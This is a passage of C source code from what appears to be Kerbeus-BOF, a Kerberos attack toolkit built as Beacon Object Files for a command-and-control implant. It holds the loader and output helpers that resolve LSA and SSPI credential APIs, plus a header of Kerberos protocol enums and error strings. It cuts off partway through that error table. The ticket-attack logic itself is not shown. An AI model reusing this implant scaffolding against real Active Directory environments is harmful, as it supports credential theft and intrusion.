typedef WINBASEAPI DWORD (WINAPI * _InitializeSecurityContextA)(PCredHandle, PCtxtHandle, SEC_CHAR*, unsigned long, unsigned long, unsigned long, PSecBufferDesc, unsigned long, PCtxtHandle, PSecBufferDesc, unsigned long*, PTimeStamp);
typedef WINBASEAPI SECURITY_STATUS (WINAPI* _DeleteSecurityContext)(PCtxtHandle phContext);
typedef WINBASEAPI SECURITY_STATUS (WINAPI* _FreeCredentialsHandle)(PCredHandle phCredential);
typedef WINBASEAPI SECURITY_STATUS (WINAPI* _AcquireCredentialsHandleA)(SEC_CHAR* pszPrincipal, SEC_CHAR* pszPackage, unsigned int fCredentialUse, void* pvLogonId, void* pAuthData, SEC_GET_KEY_FN pGetKeyFn, void* pvGetKeyArgument, PCredHandle phCredential, PTimeStamp ptsExpiry);


#define OutBlockSize 8192

LPVOID* MEMORY_BANK    __attribute__((section(".data"))) = 0;
DWORD   BANK_COUNT     __attribute__((section(".data"))) = 0;
char*   globalOut      __attribute__((section(".data"))) = 0;
WORD    globalOutSize  __attribute__((section(".data"))) = 0;
WORD    currentOutSize __attribute__((section(".data"))) = 0;

_ConvertSidToStringSidA   ADVAPI32$ConvertSidToStringSidA   __attribute__((section(".data"))) = 0;
_SystemFunction036        ADVAPI32$SystemFunction036        __attribute__((section(".data"))) = 0;
_GetTokenInformation      ADVAPI32$GetTokenInformation      __attribute__((section(".data"))) = 0;
_OpenThreadToken          ADVAPI32$OpenThreadToken          __attribute__((section(".data"))) = 0;
_OpenProcessToken         ADVAPI32$OpenProcessToken         __attribute__((section(".data"))) = 0;
_AllocateAndInitializeSid ADVAPI32$AllocateAndInitializeSid __attribute__((section(".data"))) = 0;
_EqualSid                 ADVAPI32$EqualSid                 __attribute__((section(".data"))) = 0;
_FreeSid                  ADVAPI32$FreeSid                  __attribute__((section(".data"))) = 0;

pRtlAnsiStringToUnicodeString RtlAnsiStringToUnicodeString __attribute__((section(".data"))) = 0;
pRtlInitUnicodeString         RtlInitUnicodeString         __attribute__((section(".data"))) = 0;
pRtlInitAnsiString            RtlInitAnsiString            __attribute__((section(".data"))) = 0;
pCDLocateCheckSum             CDLocateCheckSum             __attribute__((section(".data"))) = 0;
pCDLocateCSystem              CDLocateCSystem              __attribute__((section(".data"))) = 0;

_LsaConnectUntrusted            SECUR32$LsaConnectUntrusted            __attribute__((section(".data"))) = 0;
_LsaRegisterLogonProcess        SECUR32$LsaRegisterLogonProcess        __attribute__((section(".data"))) = 0;
_LsaGetLogonSessionData         SECUR32$LsaGetLogonSessionData         __attribute__((section(".data"))) = 0;
_LsaEnumerateLogonSessions      SECUR32$LsaEnumerateLogonSessions      __attribute__((section(".data"))) = 0;
_LsaFreeReturnBuffer            SECUR32$LsaFreeReturnBuffer            __attribute__((section(".data"))) = 0;
_LsaCallAuthenticationPackage   SECUR32$LsaCallAuthenticationPackage   __attribute__((section(".data"))) = 0;
_LsaDeregisterLogonProcess      SECUR32$LsaDeregisterLogonProcess      __attribute__((section(".data"))) = 0;
_LsaLookupAuthenticationPackage SECUR32$LsaLookupAuthenticationPackage __attribute__((section(".data"))) = 0;
_InitializeSecurityContextA     SECUR32$InitializeSecurityContextA     __attribute__((section(".data"))) = 0;
_DeleteSecurityContext          SECUR32$DeleteSecurityContext          __attribute__((section(".data"))) = 0;
_FreeCredentialsHandle          SECUR32$FreeCredentialsHandle          __attribute__((section(".data"))) = 0;
_AcquireCredentialsHandleA      SECUR32$AcquireCredentialsHandleA      __attribute__((section(".data"))) = 0;

LPVOID MemAlloc(SIZE_T dwBytes) {
    LPVOID mem = KERNEL32$VirtualAlloc(NULL, dwBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    MEMORY_BANK[BANK_COUNT++] = mem;
    return mem;
}

void MemCpy(PBYTE d, PBYTE s, DWORD n) {
    if (d && s)
        MSVCRT$memcpy(d, s, n);
}

void FreeBank() {
    for (int i = 0; i < BANK_COUNT; i++) {
        KERNEL32$VirtualFree(MEMORY_BANK[i], 0, MEM_RELEASE);
    }
    KERNEL32$VirtualFree(MEMORY_BANK, 0, MEM_RELEASE);
}

void SEND_OUT(BOOL done) {
    if (currentOutSize > 0) {
        BeaconOutput(CALLBACK_OUTPUT, globalOut, currentOutSize);

        for (int i = 0; i < currentOutSize; i++)
            globalOut[i] = 0;

        currentOutSize = 0;
    }
    if (done) {
        KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, globalOut );

    }
}

int INIT_BOF() {
    globalOut = KERNEL32$HeapAlloc( KERNEL32$GetProcessHeap(), 0, OutBlockSize );
    globalOutSize = OutBlockSize;
    return 1;
}

void PRINT_OUT(char* format, ...) {
    va_list args;
    va_start( args, format );
    int bufSize = MSVCRT$vsnprintf( NULL, 0, format, args );
    va_end(args);

    if (bufSize == -1)
        return;

    if (bufSize + currentOutSize < globalOutSize) {
        va_start(args, format);
        MSVCRT$vsnprintf(globalOut + currentOutSize, bufSize + 1, format, args);
        va_end(args);
        currentOutSize += bufSize;
    }
    else {
        SEND_OUT(FALSE);
        if (bufSize <= globalOutSize) {
            va_start(args, format);
            MSVCRT$vsnprintf(globalOut + currentOutSize, bufSize + 1, format, args);
            va_end(args);
            currentOutSize += bufSize;
        } else {
            char* tmpOut = MemAlloc( bufSize + 1 );
            va_start(args, format);
            MSVCRT$vsnprintf(tmpOut, bufSize + 1, format, args);
            va_end(args);
            BeaconOutput(CALLBACK_OUTPUT, tmpOut, bufSize);
//            MemFree(tmpOut);
        }
    }
}

void END_BOF() {
    SEND_OUT(TRUE);
}

BOOL LoadFunc() {
    HMODULE crypt = GetModuleHandleA("CRYPTDLL");
    if (!crypt) crypt = LoadLibraryA("CRYPTDLL");
    if (!crypt) {
        PRINT_OUT("[x] Failed to load CRYPTDLL module\n");
        goto failed;
    }

    CDLocateCheckSum = GetProcAddress(crypt, "CDLocateCheckSum");
    if (!CDLocateCheckSum) goto failed;

    CDLocateCSystem = GetProcAddress(crypt, "CDLocateCSystem");
    if (!CDLocateCSystem) goto failed;



    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    if (!ntdll) goto failed;

    RtlAnsiStringToUnicodeString = GetProcAddress(ntdll, "RtlAnsiStringToUnicodeString");
    if (!RtlAnsiStringToUnicodeString) goto failed;

    RtlInitUnicodeString = GetProcAddress(ntdll, "RtlInitUnicodeString");
    if (!RtlInitUnicodeString) goto failed;

    RtlInitAnsiString = GetProcAddress(ntdll, "RtlInitAnsiString");
    if (!RtlInitAnsiString) goto failed;




    HMODULE advapi = GetModuleHandleA("ADVAPI32");
    if (!advapi)
        advapi = LoadLibraryA("ADVAPI32");
    if (!advapi) {
        PRINT_OUT("[x] Failed to load ADVAPI32 module\n");
        goto failed;
    }

    ADVAPI32$ConvertSidToStringSidA = GetProcAddress(advapi, "ConvertSidToStringSidA");
    if (!ADVAPI32$ConvertSidToStringSidA) goto failed;

    ADVAPI32$SystemFunction036 = GetProcAddress(advapi, "SystemFunction036");
    if (!ADVAPI32$SystemFunction036) goto failed;

    ADVAPI32$GetTokenInformation = GetProcAddress(advapi, "GetTokenInformation");
    if (!ADVAPI32$GetTokenInformation) goto failed;

    ADVAPI32$OpenThreadToken = GetProcAddress(advapi, "OpenThreadToken");
    if (!ADVAPI32$OpenThreadToken) goto failed;

    ADVAPI32$OpenProcessToken = GetProcAddress(advapi, "OpenProcessToken");
    if (!ADVAPI32$OpenProcessToken) goto failed;

    ADVAPI32$AllocateAndInitializeSid = GetProcAddress(advapi, "AllocateAndInitializeSid");
    if (!ADVAPI32$AllocateAndInitializeSid) goto failed;

    ADVAPI32$EqualSid = GetProcAddress(advapi, "EqualSid");
    if (!ADVAPI32$EqualSid) goto failed;

    ADVAPI32$FreeSid = GetProcAddress(advapi, "FreeSid");
    if (!ADVAPI32$FreeSid) goto failed;

    HMODULE secur32 = GetModuleHandleA("SECUR32");
    if (!secur32)
        secur32 = LoadLibraryA("SECUR32");
    if (!secur32) {
        PRINT_OUT("[x] Failed to load SECUR32 module\n");
        goto failed;
    }

    SECUR32$LsaConnectUntrusted = GetProcAddress(secur32, "LsaConnectUntrusted");
    if (!SECUR32$LsaConnectUntrusted) goto failed;

    SECUR32$LsaRegisterLogonProcess = GetProcAddress(secur32, "LsaRegisterLogonProcess");
    if (!SECUR32$LsaRegisterLogonProcess) goto failed;

    SECUR32$LsaGetLogonSessionData = GetProcAddress(secur32, "LsaGetLogonSessionData");
    if (!SECUR32$LsaGetLogonSessionData) goto failed;

    SECUR32$LsaEnumerateLogonSessions = GetProcAddress(secur32, "LsaEnumerateLogonSessions");
    if (!SECUR32$LsaEnumerateLogonSessions) goto failed;

    SECUR32$LsaFreeReturnBuffer = GetProcAddress(secur32, "LsaFreeReturnBuffer");
    if (!SECUR32$LsaFreeReturnBuffer) goto failed;

    SECUR32$LsaCallAuthenticationPackage = GetProcAddress(secur32, "LsaCallAuthenticationPackage");
    if (!SECUR32$LsaCallAuthenticationPackage) goto failed;

    SECUR32$LsaDeregisterLogonProcess = GetProcAddress(secur32, "LsaDeregisterLogonProcess");
    if (!SECUR32$LsaDeregisterLogonProcess) goto failed;

    SECUR32$LsaLookupAuthenticationPackage = GetProcAddress(secur32, "LsaLookupAuthenticationPackage");
    if (!SECUR32$LsaLookupAuthenticationPackage) goto failed;

    SECUR32$InitializeSecurityContextA = GetProcAddress(secur32, "InitializeSecurityContextA");
    if (!SECUR32$InitializeSecurityContextA) goto failed;

    SECUR32$DeleteSecurityContext = GetProcAddress(secur32, "DeleteSecurityContext");
    if (!SECUR32$DeleteSecurityContext) goto failed;

    SECUR32$FreeCredentialsHandle = GetProcAddress(secur32, "FreeCredentialsHandle");
    if (!SECUR32$FreeCredentialsHandle) goto failed;

    SECUR32$AcquireCredentialsHandleA = GetProcAddress(secur32, "AcquireCredentialsHandleA");
    if ( !SECUR32$AcquireCredentialsHandleA) goto failed;

    MEMORY_BANK = KERNEL32$VirtualAlloc(NULL, sizeof(void*) * 0x1000, MEM_COMMIT, PAGE_READWRITE);
    BANK_COUNT = 0;

    return FALSE;

failed:
    return TRUE;

}



int my_strncmp(const char* s1, const char* s2, int len) {
    int i = 0;
    while ((s1[i] != 0) && (s1[i] == s2[i]) && (i < len))
        i++;
    if (i == len)
        return 0;
    else
        return (int)((unsigned char)s1[i] - (unsigned char)s2[i]);
}

int my_strcmp(const char* s1, const char* s2) {
    while (*s1 != 0 && *s1 == *s2) {
        s1++;
        s2++;
    }
    return (int)((unsigned char)*s1 - (unsigned char)*s2);
}

int my_strfind(const char* s, char c) {
    int index = 0;
    while (*s != '\0') {
        if (*s == c)
            return index;

        s++;
        index++;
    }
    return -1;
}

int my_strlen(char* str) {
    const char *s = str;
    while (*s) {
        ++s;
        if (*(s - 1) == '\0' && *s == '\0') break;
    }
    return s - str;
}

BOOL my_copybuf(byte** dst, byte* src, size_t size) {
    *dst = MemAlloc(size);
    if (!*dst)
        return TRUE;

    MemCpy(*dst, src, size);
    return FALSE;
}



char my_toupper(char c) {
    if (c >= 'a' && c <= 'z')
        return c - ('a' - 'A');

    return c;
}

char my_tolower(char c) {
    if (c >= 'A' && c <= 'Z')
        return c + ('a' - 'A');

    return c;
}

int my_tohex(byte* bytes, int length, char** hexString, int retLength) {
    if (retLength < length * 2 + 1)
        return 0;

    for (int i = 0; i < length; i++) {
        (*hexString)[i * 2] = (bytes[i] >> 4) & 0xF;
        (*hexString)[i * 2 + 1] = bytes[i] & 0xF;
        (*hexString)[i * 2] += ((*hexString)[i * 2] < 10) ? '0' : 'A' - 10;
        (*hexString)[i * 2 + 1] += ((*hexString)[i * 2 + 1] < 10) ? '0' : 'A' - 10;
    }
    (*hexString)[length * 2] = 0;
    return retLength;
}

int my_strgetcount( char* str, char c ) {
    int count = 0;
    int index = 0;
    while ( str[index]) {
        if ( str[index] == c )
            count++;
        index++;
    }
    return count;
}

char** my_strsplit( char* str, char c, int* count ) {
    int partCount = my_strgetcount(str, c) + 1;
    char** parts = MemAlloc(partCount * sizeof(void*));
    parts[0] = str;

    int partIndex = 1;
    int index = 0;

    while (str[index] && partIndex < partCount) {
        if (str[index] == c) {
            str[index] = 0;
            parts[partIndex] = str + index + 1;
            partIndex++;
        }
        index++;
    }
    *count = partCount;
    return parts;
}

void StrToUpper(char* str) {
    while (*str != '\0') {
        *str = my_toupper(*str);
        str++;
    }
}

void StrToLower(char* str) {
    while (*str != '\0') {
        *str = my_tolower(*str);
        str++;
    }
}

void GetDomainInfo(char** domain, char** dc) {
    if ((domain && *domain == NULL) || (dc && *dc == NULL)) {
        PDOMAIN_CONTROLLER_INFOA pDomainControllerInfo = NULL;
        DWORD dwError = NETAPI32$DsGetDcNameA(NULL, NULL, NULL, NULL, DS_DIRECTORY_SERVICE_REQUIRED, &pDomainControllerInfo);
        if (dwError == ERROR_SUCCESS) {
            if (domain && *domain == NULL)
                my_copybuf(domain, pDomainControllerInfo->DomainName, my_strlen(pDomainControllerInfo->DomainName) + 1);

            if (dc && *dc == NULL)
                my_copybuf(dc, ((char*)pDomainControllerInfo->DomainControllerName) + 2, my_strlen(((char*)pDomainControllerInfo->DomainControllerName) + 2) + 1);

            if (pDomainControllerInfo != NULL)
                NETAPI32$NetApiBufferFree(pDomainControllerInfo);
        }
    }
}

int GetStrParam(PCHAR buffer, DWORD bufferLength, PCHAR param, DWORD paramLength, PCHAR* Value){
    if ( my_strncmp(buffer, param, paramLength) == 0 ) {
        int ind = my_strfind(buffer + paramLength, ' ');
        if (ind == -1)
            ind = bufferLength - paramLength - 1;
        my_copybuf(Value, buffer + paramLength, ind + 1);
        (*Value)[ind] = 0;
        return paramLength + ind;
    }
    return 0;
}

int IsSetParam( PCHAR buffer, DWORD bufferLength, PCHAR param, DWORD paramLength, BOOL* Value ){
    if ( my_strncmp(buffer, param, paramLength) == 0 && (buffer[paramLength] == ' ' || buffer[paramLength] == 0) ) {
        *Value = TRUE;
        return paramLength;
    }
    return 0;
}


================================================
FILE: AD-BOF/Kerbeus-BOF/_include/kerb_struct.h
================================================
#pragma once

typedef unsigned int uint;
typedef unsigned char byte;

#if !(__GNUC__ >= 15)
typedef int bool;
#define true 1
#define false 0
#endif

enum KRB_KEY_USAGE {
	KRB_KEY_USAGE_AS_REQ_PA_ENC_TIMESTAMP = 1,
	KRB_KEY_USAGE_AS_REP_TGS_REP = 2,
	KRB_KEY_USAGE_AS_REP_EP_SESSION_KEY = 3,
	KRB_KEY_USAGE_TGS_REQ_ENC_AUTHOIRZATION_DATA = 4,
	KRB_KEY_USAGE_TGS_REQ_PA_AUTHENTICATOR = 7,
	KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY = 8,
	KRB_KEY_USAGE_AP_REQ_AUTHENTICATOR = 11,
	KRB_KEY_USAGE_KRB_PRIV_ENCRYPTED_PART = 13,
	KRB_KEY_USAGE_KRB_CRED_ENCRYPTED_PART = 14,
	KRB_KEY_USAGE_KRB_NON_KERB_SALT = 16,
	KRB_KEY_USAGE_KRB_NON_KERB_CKSUM_SALT = 17,
	KRB_KEY_USAGE_PA_S4U_X509_USER = 26,
};

enum KERB_CHECKSUM_ALGORITHM {
	KERB_CHECKSUM_NONE = 0,
	KERB_CHECKSUM_RSA_MD4 = 2,
	KERB_CHECKSUM_RSA_MD5 = 7,
	KERB_CHECKSUM_HMAC_SHA1_96_AES128 = 15,
	KERB_CHECKSUM_HMAC_SHA1_96_AES256 = 16,
	KERB_CHECKSUM_DES_MAC = -133,
	KERB_CHECKSUM_HMAC_MD5 = -138,
};

enum KERB_ETYPE {
	des_cbc_crc = 1,
	des_cbc_md4 = 2,
	des_cbc_md5 = 3,
	des3_cbc_md5 = 5,
	des3_cbc_sha1 = 7,
	dsaWithSHA1_CmsOID = 9,
	md5WithRSAEncryption_CmsOID = 10,
	sha1WithRSAEncryption_CmsOID = 11,
	rc2CBC_EnvOID = 12,
	rsaEncryption_EnvOID = 13,
	rsaES_OAEP_ENV_OID = 14,
	des_ede3_cbc_Env_OID = 15,
	des3_cbc_sha1_kd = 16,
	aes128_cts_hmac_sha1 = 17,
	aes256_cts_hmac_sha1 = 18,
	rc4_hmac = 23,
	rc4_hmac_exp = 24,
	subkey_keymaterial = 65,
	old_exp = -135,
};

enum HostAddressType {
	ADDRTYPE_UNIX_NULL = 0,
	ADDRTYPE_UNIX = 1,
	ADDRTYPE_INET = 2,
	ADDRTYPE_IMPLINK = 3,
	ADDRTYPE_PUP = 4,
	ADDRTYPE_CHAOS = 5,
	ADDRTYPE_XNS = 6,
	ADDRTYPE_IPX = 6,
	ADDRTYPE_OSI = 7,
	ADDRTYPE_ECMA = 8,
	ADDRTYPE_DATAKIT = 9,
	ADDRTYPE_CCITT = 10,
	ADDRTYPE_SNA = 11,
	ADDRTYPE_DECNET = 12,
	ADDRTYPE_DLI = 13,
	ADDRTYPE_LAT = 14,
	ADDRTYPE_HYLINK = 15,
	ADDRTYPE_APPLETALK = 16,
	ADDRTYPE_VOICEVIEW = 18,
	ADDRTYPE_FIREFOX = 19,
	ADDRTYPE_NETBIOS = 20,
	ADDRTYPE_BAN = 21,
	ADDRTYPE_ATM = 22,
	ADDRTYPE_INET6 = 24
};

enum KERB_MESSAGE_TYPE {
	KERB_AS_REQ = 10,
	KERB_AS_REP = 11,
	KERB_TGS_REQ = 12,
	KERB_TGS_REP = 13,
	KERB_AP_REQ = 14,
	KERB_AP_REP = 15,
	KERB_TGT_REQ = 16, // KRB-TGT-REQUEST for U2U
	KERB_TGT_REP = 17, // KRB-TGT-REPLY for U2U
	KERB_SAFE = 20,
	KERB_PRIV = 21,
	KERB_CRED = 22,
	KERB_ERROR = 30,
};

enum PADATA_TYPE {
	PADATA_NONE = 0,
	PADATA_TGS_REQ = 1,
	PADATA_AP_REQ = 1,
	PADATA_ENC_TIMESTAMP = 2,
	PADATA_PW_SALT = 3,
	PADATA_ENC_UNIX_TIME = 5,
	PADATA_SANDIA_SECUREID = 6,
	PADATA_SESAME = 7,
	PADATA_OSF_DCE = 8,
	PADATA_CYBERSAFE_SECUREID = 9,
	PADATA_AFS3_SALT = 10,
	PADATA_ETYPE_INFO = 11,
	PADATA_SAM_CHALLENGE = 12,
	PADATA_SAM_RESPONSE = 13,
	PADATA_PK_AS_REQ_19 = 14,
	PADATA_PK_AS_REP_19 = 15,
	PADATA_PK_AS_REQ_WIN = 15,
	PADATA_PK_AS_REQ = 16,
	PADATA_PK_AS_REP = 17,
	PADATA_PA_PK_OCSP_RESPONSE = 18,
	PADATA_ETYPE_INFO2 = 19,
	PADATA_USE_SPECIFIED_KVNO = 20,
	PADATA_SVR_REFERRAL_INFO = 20,
	PADATA_SAM_REDIRECT = 21,
	PADATA_GET_FROM_TYPED_DATA = 22,
	PADATA_SAM_ETYPE_INFO = 23,
	PADATA_SERVER_REFERRAL = 25,
	PADATA_TD_KRB_PRINCIPAL = 102,
	PADATA_PK_TD_TRUSTED_CERTIFIERS = 104,
	PADATA_PK_TD_CERTIFICATE_INDEX = 105,
	PADATA_TD_APP_DEFINED_ERROR = 106,
	PADATA_TD_REQ_NONCE = 107,
	PADATA_TD_REQ_SEQ = 108,
	PADATA_PA_PAC_REQUEST = 128,
	PADATA_S4U2SELF = 129,
	PADATA_PA_S4U_X509_USER = 130,
	PADATA_PA_PAC_OPTIONS = 167,
	PADATA_PK_AS_09_BINDING = 132,
	PADATA_CLIENT_CANONICALIZED = 133,
	PADATA_KEY_LIST_REQ = 161,
	PADATA_KEY_LIST_REP = 162,
};

enum KdcOptions {
	VALIDATE = 0x00000001,
	RENEW = 0x00000002,
	UNUSED29 = 0x00000004,
	ENCTKTINSKEY = 0x00000008,
	RENEWABLEOK = 0x00000010,
	DISABLETRANSITEDCHECK = 0x00000020,
	UNUSED16 = 0x0000FFC0,
	CONSTRAINED_DELEGATION = 0x00020000,
	CANONICALIZE = 0x00010000,
	CNAMEINADDLTKT = 0x00004000,
	OK_AS_DELEGATE = 0x00040000,
	REQUEST_ANONYMOUS = 0x00008000,
	UNUSED12 = 0x00080000,
	OPTHARDWAREAUTH = 0x00100000,
	PREAUTHENT = 0x00200000,
	INITIAL = 0x00400000,
	RENEWABLE = 0x00800000,
	UNUSED7 = 0x01000000,
	POSTDATED = 0x02000000,
	ALLOWPOSTDATE = 0x04000000,
	PROXY = 0x08000000,
	PROXIABLE = 0x10000000,
	FORWARDED = 0x20000000,
	FORWARDABLE = 0x40000000,
	RESERVED = 0x80000000,
};

enum PRINCIPAL_TYPE {
	PRINCIPAL_NT_UNKNOWN = 0,
	PRINCIPAL_NT_PRINCIPAL = 1,
	PRINCIPAL_NT_SRV_INST = 2,
	PRINCIPAL_NT_SRV_HST = 3,
	PRINCIPAL_NT_SRV_XHST = 4,
	PRINCIPAL_NT_UID = 5,
	PRINCIPAL_NT_X500_PRINCIPAL = 6,
	PRINCIPAL_NT_SMTP_NAME = 7,
	PRINCIPAL_NT_ENTERPRISE = 10,
};

enum ASN_TYPES {
	//public const int NULL = 5;
	//public const int OBJECT_IDENTIFIER = 6;
	//public const int Object_Descriptor = 7;
	//public const int EXTERNAL = 8;
	//public const int REAL = 9;
	//public const int ENUMERATED = 10;
	//public const int EMBEDDED_PDV = 11;
	//public const int RELATIVE_OID = 13;
	//public const int SET = 17;
	//public const int VideotexString = 21;
	//public const int GraphicString = 25;
	//public const int VisibleString = 26;
	//public const int CHARACTER_STRING = 29;

	//public const int APPLICATION = 1;
	//public const int  = 2;
	//public const int PRIVATE = 3;

	ASN_UNIVERSAL = 0,
	ASN_BOOLEAN = 1,
	ASN_APPLICATION = 1,
	ASN_CONTEXT = 2,
	ASN_INTEGER = 2,
	ASN_BIT_STRING = 3,
	ASN_OCTET_STRING = 4,
	ASN_UTF8String = 12,
	ASN_SEQUENCE = 16,
	ASN_NumericString = 18,
	ASN_PrintableString = 19,
	ASN_TeletexString = 20,
	ASN_IA5String = 22,
	ASN_UTCTime = 23,
	ASN_GeneralizedTime = 24,
	ASN_GeneralString = 27,
	ASN_UniversalString = 28,
	ASN_BMPString = 30,
	ASN_LIST = 0xa0,
};

enum TICKET_FLAGS {
	reserved = 2147483648,
	forwardable = 0x40000000,
	forwarded = 0x20000000,
	proxiable = 0x10000000,
	proxy = 0x08000000,
	may_postdate = 0x04000000,
	postdated = 0x02000000,
	invalid = 0x01000000,
	renewable = 0x00800000,
	initial = 0x00400000,
	pre_authent = 0x00200000,
	hw_authent = 0x00100000,
	ok_as_delegate = 0x00040000,
	anonymous = 0x00020000,
	//name_canonicalize	= 0x00010000,
	//cname_in_pa_data = 0x00040000,
	enc_pa_rep = 0x00010000,
	reserved1 = 0x00000001,
	empty = 0x00000000,
};

enum PacInfoBufferType {
	Pac_LogonInfo = 1,
	Pac_CredInfo = 2,
	Pac_ServerChecksum = 6,
	Pac_KDCChecksum = 7,
	Pac_ClientName = 0xA,
	Pac_S4U2Proxy = 0xb,
	Pac_UpnDns = 0xc,
	Pac_ClientClaims = 0xd,
	Pac_DeviceInfo = 0xe,
	Pac_DeviceClaims = 0xf,
	Pac_TicketChecksum = 0x10,
	Pac_Attributes = 0x11,
	Pac_Requestor = 0x12,
	Pac_FullPacChecksum = 0x13
};


byte* lookupKadminErrorCode(uint errorCode) {
	if ( errorCode > 7)
		return "unknown";

	byte* KERBEROS_ERROR[8] = {
		"KRB5_KPASSWD_SUCCESS",
		"KRB5_KPASSWD_MALFORMED",
		"KRB5_KPASSWD_HARDERROR",
		"KRB5_KPASSWD_AUTHERROR",
		"KRB5_KPASSWD_SOFTERROR",
		"KRB5_KPASSWD_ACCESSDENIED",
		"KRB5_KPASSWD_BAD_VERSION",
		"KRB5_KPASSWD_INITIAL_FLAG_NEEDED"
	};
	return KERBEROS_ERROR[errorCode];
}
/*
byte* lookupKrbErrorCode(uint errorCode) {
	if ( errorCode > 0x5d)
		return "";

	byte* KERBEROS_ERROR[0x5E] = {
		"KDC_ERR_NONE (0x0) - No error",
		"KDC_ERR_NAME_EXP (0x1) - Client's entry in KDC database has expired",
		"KDC_ERR_SERVICE_EXP (0x2) - Server's entry in KDC database has expired",
		"KDC_ERR_BAD_PVNO (0x3) - Requested Kerberos version number not supported",
		"KDC_ERR_C_OLD_MAST_KVNO (0x4) - Client's key encrypted in old master key",
		"KDC_ERR_S_OLD_MAST_KVNO (0x5) - Server's key encrypted in old master key",
		"KDC_ERR_C_PRINCIPAL_UNKNOWN (0x6) - Client not found in Kerberos database",
		"KDC_ERR_S_PRINCIPAL_UNKNOWN (0x7) - Server not found in Kerberos database",
		"KDC_ERR_PRINCIPAL_NOT_UNIQUE (0x8) - Multiple principal entries in KDC database",
		"KDC_ERR_NULL_KEY (0x9) - The client or server has a null key (master key)",
		"KDC_ERR_CANNOT_POSTDATE (0xA) - Ticket (TGT) not eligible for postdating",
		"KDC_ERR_NEVER_VALID (0xB) - Requested start time is later than end time",
		"KDC_ERR_POLICY (0xC) - Requested start time is later than end time",
		"KDC_ERR_BADOPTION (0xD) - KDC cannot accommodate requested option",
		"KDC_ERR_ETYPE_NOTSUPP (0xE) - KDC has no support for encryption type",
		"KDC_ERR_SUMTYPE_NOSUPP (0xF) - KDC has no support for checksum type",
		"KDC_ERR_PADATA_TYPE_NOSUPP (0x10) - KDC has no support for PADATA type (pre-authentication data)",
		"KDC_ERR_TRTYPE_NO_SUPP (0x11) - KDC has no support for transited type",
		"KDC_ERR_CLIENT_REVOKED (0x12) - Client's credentials have been revoked",
		"KDC_ERR_SERVICE_REVOKED (0x13) -Credentials for server have been revoked",
		"KDC_ERR_TGT_REVOKED (0x14) - TGT has been revoked",
		"KDC_ERR_CLIENT_NOTYET (0x15) - Client not yet valid�try again later",
		"KDC_ERR_SERVICE_NOTYET (0x16) -Server not yet valid�try again later",
		"KDC_ERR_KEY_EXPIRED (0x17) - Password has expired�change password to reset",
		"KDC_ERR_PREAUTH_FAILED (0x18) - Pre-authentication information was invalid",
		"KDC_ERR_PREAUTH_REQUIRED (0x19) - Additional preauthentication required",
		"KDC_ERR_SERVER_NOMATCH (0x1A) - KDC does not know about the requested server",
		"KDC_ERR_MUST_USE_USER2USER (0x1B) - Server principal valid for user2user only",
		"KDC_ERR_PATH_NOT_ACCEPTED (0x1C) - KDC Policy rejects transited path",
		"KDC_ERR_SVC_UNAVAILABLE (0x1D) - KDC is unavailable",
		"KRB_UNKNOWN (0x1E) - Code unknown",
		"KRB_AP_ERR_BAD_INTEGRITY (0x1F) - Integrity check on decrypted field failed",
		"KRB_AP_ERR_TKT_EXPIRED (0x20) - The ticket has expired",
		"KRB_AP_ERR_TKT_NYV (0x21) - The ticket is not yet valid",
		"KRB_AP_ERR_REPEAT (0x22) - The request is a replay",
		"KRB_AP_ERR_NOT_US (0x23) - The ticket is not for us",
		"KRB_AP_ERR_BADMATCH (0x24) -The ticket and authenticator do not match",
		"KRB_AP_ERR_SKEW (0x25) - The clock skew is too great",
		"KRB_AP_ERR_BADADDR (0x26) - Network address in network layer header doesn't match address inside ticket",
		"KRB_AP_ERR_BADVERSION (0x27) - Protocol version numbers don't match (PVNO)",
		"KRB_AP_ERR_MSG_TYPE (0x28) - Message type is unsupported",
		"KRB_AP_ERR_MODIFIED (0x29) - Message stream modified and checksum didn't match",
		"KRB_AP_ERR_BADORDER (0x2A) - Message out of order (possible tampering)",
		"KRB_UNKNOWN (0x2B) - Code unknown",
		"KRB_AP_ERR_BADKEYVER (0x2C) - Specified version of key is not available",
		"KRB_AP_ERR_NOKEY (0x2D) - Service key not available",
		"KRB_AP_ERR_MUT_FAIL (0x2E) - Mutual authentication failed",
		"KRB_AP_ERR_BADDIRECTION (0x2F) - Incorrect message direction",
		"KRB_AP_ERR_METHOD (0x30) - Alternative authentication method required",
		"KRB_AP_ERR_BADSEQ (0x31) - Incorrect sequence number in message",
		"KRB_AP_ERR_INAPP_CKSUM (0x32) - Inappropriate type of checksum in message (checksum may be unsupported)",
		"KRB_AP_PATH_NOT_ACCEPTED (0x33) - Desired path is unreachable",
		"KRB_ERR_RESPONSE_TOO_BIG (0x34) - Too much data",
		"KRB_UNKNOWN (0x15) - Code unknown",
		"KRB_UNKNOWN (0x16) - Code unknown",
		"KRB_UNKNOWN (0x17) - Code unknown",
		"KRB_UNKNOWN (0x18) - Code unknown",
		"KRB_UNKNOWN (0x19) - Code unknown",
		"KRB_UNKNOWN (0x1A) - Code unknown",
		"KRB_UNKNOWN (0x1B) - Code unknown",
		"KRB_ERR_GENERIC (0x3C) - Generic error; the description is in the e-data field",
		"KRB_ERR_FIELD_TOOLONG (0x3D) - Field is too long for this implementation",
		"KDC_ERR_CLIENT_NOT_TRUSTED (0x3E) - The client trust failed or is not implemented",
		"KDC_ERR_KDC_NOT_TRUSTED (0x3F) - The KDC server trust failed or could not be verified",
		"KDC_ERR_INVALID_SIG (0x40) - The signature is invalid",
		"KDC_ERR_DH_KEY_PARAMETERS_NOT_ACCEPTED (0x41) - KDC policy has determined the provided Diffie-Hellman key parameters are not acceptable",
		"KDC_ERR_CERTIFICATE_MISMATCH (0x42) - certificate doesn't match client user",
		"KRB_AP_ERR_NO_TGT (0x43) - No TGT was presented or available",
		"KDC_ERR_WRONG_REALM (0x44) -Incorrect domain or principal",
		"KRB_AP_ERR_USER_TO_USER_REQUIRED (0x45) - Ticket must be for USER-TO-USER",
		"KDC_ERR_CANT_VERIFY_CERTIFICATE (0x46)",
		"KDC_ERR_INVALID_CERTIFICATE (0x47)",
		"KDC_ERR_REVOKED_CERTIFICATE (0x48)",
		"KDC_ERR_REVOCATION_STATUS_UNKNOWN (0x49)",
		"KRB_UNKNOWN (0x4A) - Code unknown",
		"KDC_ERR_CLIENT_NAME_MISMATCH (0x4B)",
		"KDC_ERR_KDC_NAME_MISMATCH (0x4C)",
